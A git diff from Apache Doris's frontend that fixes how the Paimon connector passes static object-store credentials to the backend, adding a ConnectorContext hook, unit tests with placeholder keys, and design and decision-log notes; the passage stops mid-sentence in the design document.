"t1", Collections.emptyList(), Collections.emptyList()); + handle.setPaimonTable(table); + + // The connector holds the RAW catalog aliases; the engine seam returns the BE-canonical map. + Map props = new HashMap<>(); + props.put("s3.access_key", "raw-ak"); + props.put("s3.secret_key", "raw-sk"); + + Map backendStatic = new HashMap<>(); + backendStatic.put("AWS_ACCESS_KEY", "ak"); + backendStatic.put("AWS_SECRET_KEY", "sk"); + backendStatic.put("AWS_ENDPOINT", "ep"); + + PaimonScanPlanProvider provider = new PaimonScanPlanProvider( + props, new RecordingPaimonCatalogOps(), + scanContext(backendStatic, Collections.emptyMap())); + + Map scanProps = provider.getScanNodeProperties( + null, handle, Collections.emptyList(), Optional.empty()); + + // WHY (BLOCKER B-9): BE's native (FILE_S3) reader understands ONLY AWS_* keys. The connector + // must ship the engine-normalized canonical creds under location.*, NOT the raw catalog aliases + // (s3.access_key/…) which BE cannot read (403 on a private bucket). MUTATION: re-introducing the + // raw passthrough -> location.s3.access_key present / location.AWS_ACCESS_KEY absent -> red. + Assertions.assertEquals("ak", scanProps.get("location.AWS_ACCESS_KEY")); + Assertions.assertEquals("sk", scanProps.get("location.AWS_SECRET_KEY")); + Assertions.assertEquals("ep", scanProps.get("location.AWS_ENDPOINT")); + Assertions.assertFalse(scanProps.containsKey("location.s3.access_key"), + "the raw catalog alias must NOT reach BE (that is the B-9 bug)"); + Assertions.assertFalse(scanProps.containsKey("location.s3.secret_key"), + "the raw catalog alias must NOT reach BE (that is the B-9 bug)"); + } + @Test public void getScanNodePropertiesOverlaysVendedCreds() { FakePaimonTable table = new FakePaimonTable( @@ -550,16 +595,20 @@ public void getScanNodePropertiesOverlaysVendedCreds() { "db1", "t1", Collections.emptyList(), Collections.emptyList()); handle.setPaimonTable(table); + // Static (engine-normalized) creds; vended (REST per-table) creds collide on AWS_ACCESS_KEY / + // AWS_ENDPOINT and must WIN (legacy precedence: vended overlays static). + Map backendStatic = new HashMap<>(); + backendStatic.put("AWS_ACCESS_KEY", "static-ak"); + backendStatic.put("AWS_ENDPOINT", "static-ep"); + Map vended = new HashMap<>(); vended.put("AWS_ACCESS_KEY", "vended-ak"); vended.put("AWS_SECRET_KEY", "vended-sk"); vended.put("AWS_TOKEN", "vended-tok"); - vended.put("s3.endpoint", "vended-ep"); // collides with the static s3.endpoint below + vended.put("AWS_ENDPOINT", "vended-ep"); - Map props = new HashMap<>(); - props.put("s3.endpoint", "static-ep"); PaimonScanPlanProvider provider = new PaimonScanPlanProvider( - props, new RecordingPaimonCatalogOps(), vendingContext(vended)); + new HashMap<>(), new RecordingPaimonCatalogOps(), scanContext(backendStatic, vended)); Map scanProps = provider.getScanNodeProperties( null, handle, Collections.emptyList(), Optional.empty()); @@ -567,17 +616,17 @@ public void getScanNodePropertiesOverlaysVendedCreds() { // WHY (BLOCKER): native-reader REST tables must receive normalized vended AWS_* creds under // location.*; without them BE hits the object store with no credentials (403). Vended overlays // static (legacy precedence). MUTATION: no overlay loop / context not threaded -> AWS_* absent - // -> red; overlaying BEFORE the static loop -> the colliding location.s3.endpoint keeps the - // static value -> red. + // -> red; overlaying static AFTER vended -> the colliding location.AWS_ACCESS_KEY/ENDPOINT keep + // the static value -> red. Assertions.assertEquals("vended-ak", scanProps.get("location.AWS_ACCESS_KEY")); Assertions.assertEquals("vended-sk", scanProps.get("location.AWS_SECRET_KEY")); Assertions.assertEquals("vended-tok", scanProps.get("location.AWS_TOKEN")); - Assertions.assertEquals("vended-ep", scanProps.get("location.s3.endpoint"), + Assertions.assertEquals("vended-ep", scanProps.get("location.AWS_ENDPOINT"), "vended creds must overlay (win over) the static location key on collision"); } @Test - public void getScanNodePropertiesNoContextUnchanged() { + public void getScanNodePropertiesNoContextNoStorageProps() { FakePaimonTable table = new FakePaimonTable( "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); PaimonTableHandle handle = new PaimonTableHandle( @@ -585,17 +634,20 @@ public void getScanNodePropertiesNoContextUnchanged() { handle.setPaimonTable(table); Map props = new HashMap<>(); - props.put("s3.endpoint", "static-ep"); + props.put("s3.access_key", "raw-ak"); // 2-arg ctor -> context == null (the offline harness path). PaimonScanPlanProvider provider = new PaimonScanPlanProvider(props, new RecordingPaimonCatalogOps()); Map scanProps = provider.getScanNodeProperties( null, handle, Collections.emptyList(), Optional.empty()); - // WHY: with no context (offline / no vended support) the static-only behavior is preserved — - // no overlay, no NPE. MUTATION: NPE on null context, or adding vended keys -> red. - Assertions.assertEquals("static-ep", scanProps.get("location.s3.endpoint")); + // WHY: the connector cannot normalize static creds without the engine seam, so with no context + // (offline only — production always wires one) it emits NO storage props — never the broken raw + // aliases that BE cannot read. MUTATION: NPE on null context, or re-adding the raw passthrough + // -> location.s3.access_key present -> red. + Assertions.assertFalse(scanProps.containsKey("location.s3.access_key"), + "no context -> the raw alias must not be shipped to BE"); Assertions.assertFalse(scanProps.containsKey("location.AWS_ACCESS_KEY"), - "no context -> no vended overlay"); + "no context -> no normalized overlay"); } } diff --git a/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java b/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java index 2442c8bf6729c2..484908636610d0 100644 --- a/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java +++ b/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java @@ -162,4 +162,27 @@ default Map vendStorageCredentials(Map rawVended default String normalizeStorageUri(String rawUri) { return rawUri; } + + /** + * Returns the catalog's static storage credentials/config normalized to BE-canonical scan + * properties: object-store creds as {@code AWS_ACCESS_KEY} / {@code AWS_SECRET_KEY} / + * {@code AWS_TOKEN} / {@code AWS_ENDPOINT} / {@code AWS_REGION}, and HDFS config as the resolved + * {@code hadoop.*} / {@code dfs.*} keys (user overrides plus the legacy-derived defaults). The + * engine runs the same {@code CredentialUtils.getBackendPropertiesFromStorageMap} that legacy / + * iceberg / hive use over the catalog's parsed {@code StorageProperties} map — the single source of + * truth — so there is no re-ported normalization that could drift. + * + *

      BE's native (FILE_S3) reader understands ONLY these canonical keys. A connector that copies + * the raw catalog aliases ({@code s3.access_key}, {@code oss.access_key}, …) to BE hands the native + * reader no usable credentials → 403 on a private bucket. A connector that emits static storage + * props to BE MUST source them from this hook. + * + *

      The default returns empty (no normalization machinery / no storage map), so every other + * connector — and any credential-less (e.g. local-filesystem) warehouse — is unaffected. + * + * @return the BE-facing normalized storage-property map, or empty when none + */ + default Map getBackendStorageProperties() { + return Collections.emptyMap(); + } } diff --git a/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java b/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java index 5edee43c73c6d6..3f9dbbdee0d8cf 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java +++ b/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java @@ -178,6 +178,17 @@ public Map vendStorageCredentials(Map rawVendedC } } + @Override + public Map getBackendStorageProperties() { + // Mirror legacy PaimonScanNode.getLocationProperties(): translate the catalog's parsed + // StorageProperties map into BE-canonical scan keys (AWS_* for object stores, hadoop/dfs for + // HDFS) via the SAME CredentialUtils.getBackendPropertiesFromStorageMap legacy/iceberg/hive use + // — single source of truth, no drift. The map is already validated at catalog creation, so this + // does not throw; an empty map (non-plugin ctor / local-FS warehouse) yields an empty result + // (no overlay) — correct parity, unlike normalizeStorageUri which must fail-loud on a bad path. + return CredentialUtils.getBackendPropertiesFromStorageMap(storagePropertiesSupplier.get()); + } + @Override public String normalizeStorageUri(String rawUri) { if (Strings.isNullOrEmpty(rawUri)) { diff --git a/fe/fe-core/src/test/java/org/apache/doris/connector/DefaultConnectorContextBackendStoragePropsTest.java b/fe/fe-core/src/test/java/org/apache/doris/connector/DefaultConnectorContextBackendStoragePropsTest.java new file mode 100644 index 00000000000000..1eef70907b8ce7 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/connector/DefaultConnectorContextBackendStoragePropsTest.java @@ -0,0 +1,84 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector; + +import org.apache.doris.common.security.authentication.ExecutionAuthenticator; +import org.apache.doris.datasource.property.storage.StorageProperties; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.function.Function; +import java.util.function.Supplier; +import java.util.stream.Collectors; + +/** + * FIX-STATIC-CREDS-BE (B-9) fe-core bridge test: pins that + * {@link DefaultConnectorContext#getBackendStorageProperties} translates the catalog's parsed + * {@code StorageProperties} map into the BE-canonical {@code AWS_*} keys (the same + * {@code CredentialUtils.getBackendPropertiesFromStorageMap} legacy {@code PaimonScanNode} returns + * from {@code getLocationProperties()}). The paimon connector cannot import that machinery, so this + * hook is its only access; without it the connector ships raw {@code s3.access_key}/{@code oss.*} + * aliases to BE, whose native (FILE_S3) reader understands only {@code AWS_*} -> no usable + * credentials -> 403 on a private bucket. FAILS before the fix (the method is a no-op default + * returning empty). + */ +public class DefaultConnectorContextBackendStoragePropsTest { + + private static final Supplier NOOP_AUTH = + () -> new ExecutionAuthenticator() {}; + + /** A context whose storage-props supplier yields a real OSS storage-properties map, built with + * the same {@code StorageProperties.createAll} machinery a real OSS catalog uses. */ + private static DefaultConnectorContext ossContext() throws Exception { + Map oss = new HashMap<>(); + oss.put("oss.endpoint", "oss-cn-beijing.aliyuncs.com"); + oss.put("oss.access_key", "ak"); + oss.put("oss.secret_key", "sk"); + List all = StorageProperties.createAll(oss); + Map map = all.stream() + .collect(Collectors.toMap(StorageProperties::getType, Function.identity(), (a, b) -> a)); + return new DefaultConnectorContext("c", 1L, NOOP_AUTH, () -> map); + } + + @Test + public void normalizesStaticOssCredsToBackendAwsProps() throws Exception { + // WHY (BLOCKER B-9): the BE native S3/object-store reader consumes ONLY canonical AWS_* keys; + // the raw oss.access_key/oss.secret_key catalog aliases are unintelligible to it. The bridge + // must run getBackendPropertiesFromStorageMap to produce them. MUTATION: returning the no-op + // default (empty), or echoing the raw oss.* keys -> AWS_ACCESS_KEY absent -> red. + Map be = ossContext().getBackendStorageProperties(); + + Assertions.assertEquals("ak", be.get("AWS_ACCESS_KEY")); + Assertions.assertEquals("sk", be.get("AWS_SECRET_KEY")); + Assertions.assertNotNull(be.get("AWS_ENDPOINT"), "endpoint must be emitted as canonical AWS_ENDPOINT"); + Assertions.assertFalse(be.containsKey("oss.access_key"), + "the raw catalog alias must NOT survive to BE (that is the B-9 bug)"); + } + + @Test + public void noStorageMapYieldsEmpty() { + // WHY: a context with no storage map (non-plugin ctor, or a credential-less local-FS warehouse) + // must short-circuit to empty -> no overlay, parity with legacy + // getBackendPropertiesFromStorageMap({}). MUTATION: NPE, or fabricating props from nothing -> red. + Assertions.assertTrue(new DefaultConnectorContext("c", 1L).getBackendStorageProperties().isEmpty()); + } +} diff --git a/plan-doc/01-spi-extensions-rfc.md b/plan-doc/01-spi-extensions-rfc.md index dd00eea767c4ae..1a82f500fcdac6 100644 --- a/plan-doc/01-spi-extensions-rfc.md +++ b/plan-doc/01-spi-extensions-rfc.md @@ -1289,3 +1289,23 @@ fi **作用域/偏差**:归一化用 catalog **静态** `getStoragePropertiesMap()`,非 legacy 的 vended-overlay 版(`VendedCredentialsFactory`)——scheme 归一化与 vended 凭据正交(vended 改 `AWS_*` 键非 scheme),仅 *纯-vended-无静态存储配* REST catalog 的边角会缺 entry→fail-loud;该边角归凭据缝(#2 `FIX-STATIC-CREDS-BE` / `FIX-REST-VENDED`),见 [DV-025](./deviations-log.md)。 **测**:fe-core `DefaultConnectorContextNormalizeUriTest`(真 OSS map,oss://→s3://、s3:// 恒等、null/blank、空 map fail-loud);连接器 `PaimonScanPlanProviderTest` 3 测(`buildNativeRange` 数据文件+DV 双归一化、无-DV 仅数据、无-context 裸路)。live-e2e(OSS warehouse + DV)CI-gated。 + +## 22. 扩展 E14:静态存储凭据归一化(`ConnectorContext.getBackendStorageProperties`) + +> 后补节(2026-06-11,P5-fix-FIX-STATIC-CREDS-BE)。finding B-9(BLOCKER,3/3 confirmed)—— 见 [task-list #2](./task-list-P5-rereview2-fixes.md) / [设计](./tasks/designs/P5-fix-STATIC-CREDS-BE-design.md) / [D-048](./decisions-log.md)。凭据三道缝之第三道(static→BE-scan),review §9.3 两轮均漏。 + +**问题**:paimon 连接器把**静态 catalog 级存储凭据/配置裸传 BE**。`PaimonScanPlanProvider.getScanNodeProperties:372-381` 遍历裸 catalog `properties`,对 `s3.`/`cos.`/`oss.`/`obs.`/`hadoop.`/`fs.`/`dfs.`/`hive.` 前缀的键发 `location.=`;fe-core bridge `PluginDrivenScanNode.getLocationProperties:307-317` 只**剥** `location.` 前缀、从不归一化。BE native ORC/Parquet(FILE_S3)reader 只解析 canonical `AWS_ACCESS_KEY`/`AWS_SECRET_KEY`/`AWS_ENDPOINT`/`AWS_REGION`/`AWS_TOKEN`(`s3_util.cpp:146-150`)→ 私有 object-store 桶 native 读拿不到凭据 → **403/AccessDenied**。公有桶 + JNI 路不受影响(序列化 paimon `Table` 自带 `FileIO`)。裸 `AWS_*`/`access_key`(无 `s3.` 前缀)被前缀过滤整个丢弃。区别于已修两缝:FIX-STORAGE-CREDS 修 *catalog FileIO* 缝、FIX-REST-VENDED 修 *vended(REST) scan→BE* 缝。 + +**根因**:legacy `PaimonScanNode.getLocationProperties:650-652` **仅**返回 `backendStorageProperties`(`:176` = `CredentialUtils.getBackendPropertiesFromStorageMap(storagePropertiesMap)`,catalog 已解析的 `StorageProperties` map)。`getBackendPropertiesFromStorageMap` 逐 `StorageProperties` 调 `getBackendConfigProperties()` → canonical 键(`AbstractS3CompatibleProperties:106-120` 发 `AWS_*`;`HdfsProperties:163-200` 发已解析 `hadoop.`/`dfs.` + legacy 默认)。翻闸把这一归一化调用换成裸前缀拷贝循环。连接器禁 import fe-core `StorageProperties`/`CredentialUtils`(`tools/check-connector-imports.sh`)→ 须经 SPI 缝。 + +**SPI 面(default 空,零它连接器影响)**: +- `ConnectorContext.getBackendStorageProperties() → Map`(`fe-connector-spi`):default 返回 `Collections.emptyMap()`,故 es/jdbc/maxcompute/trino 及无凭据(local-FS)warehouse 不受影响。 +- fe-core `DefaultConnectorContext` override:`CredentialUtils.getBackendPropertiesFromStorageMap(storagePropertiesSupplier.get())`——复用 #1(FIX-URI-NORMALIZE)已接线的 `storagePropertiesSupplier`(= `catalogProperty.getStoragePropertiesMap()`)+ 已 import 的 `CredentialUtils`。**无 ctor 改**。map 在 catalog 创建时已校验故不抛;空 map(非-plugin ctor / local-FS)→ 空结果(无 overlay),parity——异于 `normalizeStorageUri` 须对坏路径 fail-loud。 + +**连接器侧**:`PaimonScanPlanProvider.getScanNodeProperties` **整段**替换裸前缀拷贝循环为 `context.getBackendStorageProperties()` overlay(`context != null` 闸,同 vended overlay;offline 单测无 context → 不发存储键,绝不发坏的裸别名)。vended overlay(`vendStorageCredentials`)仍紧随其后 → vended overlay static、collision 胜(legacy 优先序)。无连接器新 import(`Map`/`LinkedHashMap` 已 import)→ import-gate 净。 + +**作用域(D-048 用户签字 = full legacy-parity,非窄 object-store-only)**:`getBackendPropertiesFromStorageMap` 即 legacy `getLocationProperties()` 精确值。HDFS catalog 下 full 替换**严格 ≥** 旧裸拷(保留用户 `hadoop.`/`dfs.`/`fs.`/`juicefs.` override + 补 legacy 默认 → 顺修 review §211 MINOR);丢的 `hive.*` 键 legacy 本不发 scan location → 丢之即**恢复** parity。 + +**ANONYMOUS-leak 边角(调查→非问题)**:连接器分两步归一化(static 经本缝、vended 经 `vendStorageCredentials`),异于 legacy 的 merge-then-normalize-once。故带静态 object-store endpoint 但**无静态 keys** 的 REST catalog,static overlay 可能发 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`(`AbstractS3CompatibleProperties:124-128` blank-key 支)而 vended overlay(有 keys→无 provider-type)不清它。**BE 证伪无回归**:`s3_util.cpp` 两 provider(`_v1:383-389`/`_v2:448-455`)均**先**查显式 ak/sk 返回 `SimpleAWSCredentialsProvider`,keys 在则永不达 `Anonymous` 支 → vended keys 恒胜。primary B-9 路(静态 catalog **有** keys)provider-type 为 null 不发。 + +**测**:fe-core `DefaultConnectorContextBackendStoragePropsTest`(真 OSS map → `AWS_*` 存在 + 裸 `oss.access_key` 不存在;无 supplier ctor → 空);连接器 `PaimonScanPlanProviderTest` 3 测(静态裸别名→canonical AWS_*、裸别名不达 BE;vended overlay static collision 胜;无-context 不发存储键)。red-check 反转产线码 2/3 向红。模块 217/0/0(1 CI-gated skip)。live-e2e(私有 S3/OSS 静态凭据 native 读)CI-gated。 diff --git a/plan-doc/decisions-log.md b/plan-doc/decisions-log.md index d37bd3352b40d3..d893c70e7e129b 100644 --- a/plan-doc/decisions-log.md +++ b/plan-doc/decisions-log.md @@ -15,6 +15,7 @@ | 编号 | 别名 | 简述 | 日期 | 状态 | |---|---|---|---|---| +| D-048 | P5-fix#2 | **FIX-STATIC-CREDS-BE(B-9 BLOCKER)作用域 = full legacy-parity 替换(用户签字,2026-06-11)**:翻闸后 paimon 连接器 `PaimonScanPlanProvider.getScanNodeProperties:372-381` 把静态 catalog 凭据/配置(`s3.`/`oss.`/`cos.`/`obs.`/`hadoop.`/`fs.`/`dfs.`/`hive.` 前缀)裸拷进 `location.`,fe-core bridge `PluginDrivenScanNode.getLocationProperties` 只剥前缀不归一化 → BE native(FILE_S3) reader 只认 `AWS_ACCESS_KEY`/`AWS_SECRET_KEY`/`AWS_ENDPOINT`/`AWS_REGION`/`AWS_TOKEN`(`s3_util.cpp`)→ 私有桶 native 读拿不到凭据 403。是 review §9.3 凭据**第三道缝**(static→BE-scan,FIX-STORAGE-CREDS 修 catalog FileIO 缝、FIX-REST-VENDED 修 vended 缝,本缝两轮均漏)。legacy `PaimonScanNode.getLocationProperties:650-652` 仅返回 `CredentialUtils.getBackendPropertiesFromStorageMap(storagePropertiesMap)`(canonical map)。**用户定 = 方案 A(full legacy-parity,非窄 object-store-only)**:新 SPI `ConnectorContext.getBackendStorageProperties()`(default 空,仅 paimon 调)= 引擎用 #1 已接线的 `storagePropertiesSupplier`(`catalogProperty.getStoragePropertiesMap()`)跑同一 `getBackendPropertiesFromStorageMap` → 连接器**整段**替换裸拷循环为该 overlay(vended overlay 仍后置、collision 胜,legacy 优先序)。object-store→`AWS_*`;HDFS→canonical(保留用户 `hadoop.`/`dfs.`/`fs.`/`juicefs.` override + 补 legacy 默认 `ipc.client.fallback-to-simple-auth-allowed` 等,**顺修 review §211 MINOR**);丢非-parity `hive.*` 裸键(legacy 本不发 scan location)。一处 SPI 调用替掉前缀循环、单一真相源、无漂移。**ANONYMOUS-leak 边角经 BE 证伪无回归**(`s3_util.cpp` v1:383/v2:448 显式 ak/sk 优先于 `cred_provider_type`,vended keys 在则永不走 Anonymous 支)。无 ctor 改、无连接器新 import(import-gate 净)。SPI RFC §22(E14)。测:fe-core `DefaultConnectorContextBackendStoragePropsTest`(2)+连接器 `PaimonScanPlanProviderTest`(3 改/增,red-check 2/3 向红);模块 217/0/0。设计 [`P5-fix-STATIC-CREDS-BE-design.md`](./tasks/designs/P5-fix-STATIC-CREDS-BE-design.md) | 2026-06-11 | ✅ | | D-039 | P5-D8 | **P5 paimon B4 E7 sys-table SPI 形状 = 复用 live fe-core SysTable 机制(用户签字,2026-06-10)**:RFC §10 的「sys-table 当 `$`-后缀普通表、连接器在 `getTableHandle` 内解析后缀 + `listSysTableSuffixes`」设计**从未落地**——live fe-core 实为 `SysTableResolver`+`NativeSysTable`+`TableIf.getSupportedSysTables/findSysTable`(`BindRelation`/`DescribeCommand`/`ShowCreateTableCommand` 调用;iceberg + legacy-paimon 共用),RFC §10 已 stale。**用户定 = 复用 live 机制(非 RFC §10)**:① 连接器 SPI 加 `ConnectorTableOps.listSupportedSysTables` + `getSysTableHandle`(default no-op,MC/jdbc/es/trino 不受影响);② fe-core `PluginDrivenExternalTable.getSupportedSysTables` 委托连接器(`listSupportedSysTables`),通用 `PluginDrivenSysTable extends NativeSysTable` + `PluginDrivenSysExternalTable`(**报 `PLUGIN_EXTERNAL_TABLE` 非连接器类型**,经现有 `SysTableResolver` 路由到 `PluginDrivenScanNode`)。否决 RFC §10 的 `getTableHandle("$suffix")`-路由(须改 `BindRelation`/`RelationUtil`、大 surface、偏离 iceberg)。RFC §10 标 superseded([DV-023](./deviations-log.md))。**T20(E5 MVCC)置于 B4** = 连接器侧 groundwork(inert until B5 wires fe-core MvccTable 消费者;翻闸 gated on B5 故 inert capability 不达用户,安全)。设计 `tasks/P5-paimon-migration.md` §批次 B4 | 2026-06-10 | ✅ | | D-038 | P5-D2 | **P5 paimon MTMV + MVCC(时间旅行) scope = P5 内实现桥,翻闸 gated on 它(用户签字,design-only)**:SPI 当前 **MTMV 完全无面(E10 缺)**(`PluginDrivenExternalTable:62` 不 implements MTMVRelatedTableIf/MTMVBaseTableIf/MvccTable,框架靠 `instanceof MTMVRelatedTableIf` 分发——`MTMVPartitionUtil:265/497/588`、`StatementContext:987/1003`),E5(MVCC) `defined-no-consumer`(`ConnectorMvccSnapshotAdapter` 仅自身文件引用、`ConnectorScanRange` 无 snapshot 字段)。legacy `PaimonExternalTable:74` 实现全套。翻闸不机械阻断(plain SELECT 经 `getPaimonTable(empty)` 取 latest)但按 MC 样板直接翻闸=**静默回归** paimon-as-MTMV-base + 时间旅行。**用户定 = 方案 A**:P5 内落 fe-core `PaimonPluginDrivenExternalTable extends PluginDrivenExternalTable` 实现三接口 + 首个真 E5 消费者 override `beginQuerySnapshot` 三方法 + 新增 GAP-LISTPART-AT-SNAPSHOT 的 at-snapshot listPartitions;表级 staleness=`ConnectorMvccSnapshot.getSnapshotId()`(-1 空表)、分区级=`ConnectorPartitionInfo.getLastModifiedMillis()`(已存在);MTMV 类型/PartitionItem 留 fe-core、连接器仅供 SPI-neutral 数据。**翻闸(B7) gated on MTMV 桥(B5)**;**禁**静默读 latest。否决 B(翻闸先行 + MTMV fail-loud 延后)。最高 correctness 风险=单-pin 不变式 + `lastFileCreationTime()` 跨 flavor 可靠性(SDK 行为,须 live 验)。设计 `tasks/P5-paimon-migration.md` §开放决策 D2 + recon §3.5/§4 | 2026-06-09 | ✅ | | D-037 | P5-D1 | **P5 paimon flavor(hms/filesystem/dlf/rest/jdbc) 装配 = 单 Catalog + `createCatalog` flavor switch(MC 一致,用户签字,design-only)**:连接器现走单 Catalog stub(`PaimonConnector.createCatalog:75-83` 把 `Options.fromMap` 直喂 paimon SDK CatalogFactory,无 Doris 侧 warehouse/HiveConf/StorageProperties/authenticator 装配);5 个 `fe-connector-paimon-backend-*` 模块**是空壳**(仅 gitignore `.flattened-pom.xml`、零 src/未注册 Maven 模块)。legacy 装配在 fe-core `AbstractPaimonProperties`+5 子类+`PaimonPropertiesFactory`,全 import 禁用的 fe-core `StorageProperties`/`HMSBaseProperties`/`HadoopExecutionAuthenticator`。**用户定 = 方案 A**:`PaimonConnector.createCatalog` 内 switch on `paimon.catalog.type`,**拷** warehouse/conf/S3-normalize + 重建 Hadoop/HiveConf + **每-flavor ExecutionAuthenticator** 入模块(镜像 MC 拷 MCProperties→MCConnectorProperties;filesystem→hms→rest/jdbc/dlf 渐进)。**不**建 backend 模块 + ServiceLoader(否决 B:无 MC 先例、大 surface、空壳从零建)。约束:StorageProperties 从属性 map 重建(禁 import);**每-flavor authenticator 必须保**(否则 Kerberized HMS/HDFS DDL 运行时炸、无离线测覆盖)。设计 `tasks/P5-paimon-migration.md` §开放决策 D1 + recon §3.4 | 2026-06-09 | ✅ | diff --git a/plan-doc/task-list-P5-rereview2-fixes.md b/plan-doc/task-list-P5-rereview2-fixes.md index 291e8288c21967..aea9f2fc004006 100644 --- a/plan-doc/task-list-P5-rereview2-fixes.md +++ b/plan-doc/task-list-P5-rereview2-fixes.md @@ -24,7 +24,7 @@ | # | ID | sev | finding | area / file(s) | SPI? | design | impl | build+UT | commit | |---|----|-----|---------|----------------|------|--------|------|----------|--------| | 1 | FIX-URI-NORMALIZE | BLOCKER | B-7DV + B-7DF | native data-file + DV path scheme norm (oss/cos/obs/s3a→s3) | **yes** | ✅ | ✅ | ✅ | ✅ `20b19d19dd8` | -| 2 | FIX-STATIC-CREDS-BE | BLOCKER | B-9 | static s3/oss/cos/obs creds → BE as canonical `AWS_*` | **yes** | ⬜ | ⬜ | ⬜ | ⬜ | +| 2 | FIX-STATIC-CREDS-BE | BLOCKER | B-9 | static s3/oss/cos/obs creds → BE as canonical `AWS_*` | **yes** | ✅ | ✅ | ✅ | ✅ | | 3 | FIX-SCHEMA-EVOLUTION | BLOCKER | B-1a (+M-10) | emit `current_schema_id`/`history_schema_info` + field-id thru SPI | **yes** | ⬜ | ⬜ | ⬜ | ⬜ | | 4 | FIX-JDBC-DRIVER-URL | BLOCKER | B-8a + B-8b | resolve+alias `jdbc.driver_url` for BE; enforce security allow-list | maybe | ⬜ | ⬜ | ⬜ | ⬜ | | 5 | FIX-MAPPING-FLAG-KEYS | MAJOR | M-crit | dotted-vs-underscore type-mapping flag keys (wrong type) | no | ⬜ | ⬜ | ⬜ | ⬜ | diff --git a/plan-doc/tasks/designs/P5-fix-STATIC-CREDS-BE-design.md b/plan-doc/tasks/designs/P5-fix-STATIC-CREDS-BE-design.md new file mode 100644 index 00000000000000..160fe02d8c22f1 --- /dev/null +++ b/plan-doc/tasks/designs/P5-fix-STATIC-CREDS-BE-design.md @@ -0,0 +1,117 @@ +# P5-fix-FIX-STATIC-CREDS-BE — design + +> Task #2 (BLOCKER) of `plan-doc/task-list-P5-rereview2-fixes.md`. Finding **B-9** from `plan-doc/reviews/P5-paimon-rereview2-2026-06-11.md` (3/3 CONFIRMED). The third credential seam (static→BE-scan), missed by both the prior round and the 8 fixes (review §9.3). +> Re-confirmed against current code (HEAD `20b19d19dd8`, post-#1) on 2026-06-11. Line numbers below are CURRENT. +> **User-signed scope** (D-048): full legacy-parity — replace the whole raw `location.*` passthrough loop with the engine's canonical backend-storage map. + +## Problem + +The paimon connector copies **static catalog-level storage credentials/config verbatim** into the BE scan-node properties. `PaimonScanPlanProvider.getScanNodeProperties:372-381` iterates the raw catalog `properties` and, for any key prefixed `s3.`/`cos.`/`oss.`/`obs.`/`hadoop.`/`fs.`/`dfs.`/`hive.`, emits `location. = `. The fe-core bridge `PluginDrivenScanNode.getLocationProperties:307-317` only **strips** the `location.` prefix — it never normalizes. So BE's native ORC/Parquet (FILE_S3) reader receives `s3.access_key` / `oss.access_key` / … , but it parses **only** the canonical `AWS_ACCESS_KEY` / `AWS_SECRET_KEY` / `AWS_ENDPOINT` / `AWS_REGION` / `AWS_TOKEN` (BE `s3_util.cpp:146-150`). + +Result on any **private** object-store bucket (S3 / OSS / COS / OBS): the native reader gets **no usable credentials → 403 / AccessDenied**. Public buckets and the JNI path are unaffected (the serialized paimon `Table` carries its own `FileIO`). The bare `AWS_*` / `access_key` form (no `s3.` prefix) is dropped entirely by the prefix filter. + +This is distinct from the two credential seams already fixed: +- **FIX-STORAGE-CREDS** fixed the *catalog FileIO* seam (canonical → `fs.s3a.*` for paimon's own metadata reads). +- **FIX-REST-VENDED** fixed the *vended (REST) scan→BE* seam (`ConnectorContext.vendStorageCredentials`). +- **This (B-9)** is the *static catalog creds → BE scan* seam — review §9.3, seam #3. + +## Root Cause + +Legacy `PaimonScanNode.getLocationProperties:650-652` returns **only** `backendStorageProperties`, computed at `:176` as: +```java +backendStorageProperties = CredentialUtils.getBackendPropertiesFromStorageMap(storagePropertiesMap); +``` +where `storagePropertiesMap` is the catalog's **parsed** `StorageProperties` map (`getStoragePropertiesMap()`, vended-merged for REST). `getBackendPropertiesFromStorageMap` walks each `StorageProperties` and calls `getBackendConfigProperties()`, which yields the BE-canonical keys: `AbstractS3CompatibleProperties:106-120` emits `AWS_ENDPOINT/AWS_REGION/AWS_ACCESS_KEY/AWS_SECRET_KEY/AWS_TOKEN/…`; `HdfsProperties:163-200` emits the resolved `hadoop.`/`dfs.` config (user overrides **plus** legacy defaults like `ipc.client.fallback-to-simple-auth-allowed`). + +The cutover replaced this single normalized call with a raw prefix-copy loop. The connector **cannot** import fe-core's `StorageProperties` / `CredentialUtils` (SPI boundary, `tools/check-connector-imports.sh`), so it had no access to the normalization — hence the raw copy. + +## Design + +**A new `ConnectorContext` SPI hook `getBackendStorageProperties()`** that returns exactly legacy's `getBackendPropertiesFromStorageMap(storagePropertiesMap)`. The engine already holds the authoritative parsed map: `DefaultConnectorContext.storagePropertiesSupplier` (= `catalogProperty.getStoragePropertiesMap()`) was wired in fix #1 for `normalizeStorageUri`. The connector replaces its raw passthrough loop with one overlay of this map; the existing `vendStorageCredentials` overlay stays **after** it (vended wins on collision — legacy precedence). This mirrors the `vendStorageCredentials` / `normalizeStorageUri` seams exactly (the task-list's recommended pattern) and is the single source of truth — no re-ported normalization that could drift. + +**Why full replacement (D-048, user-signed), not object-store-only**: `getBackendPropertiesFromStorageMap` is the exact legacy `getLocationProperties()` value. For HDFS catalogs it is **strictly ≥** the current passthrough — 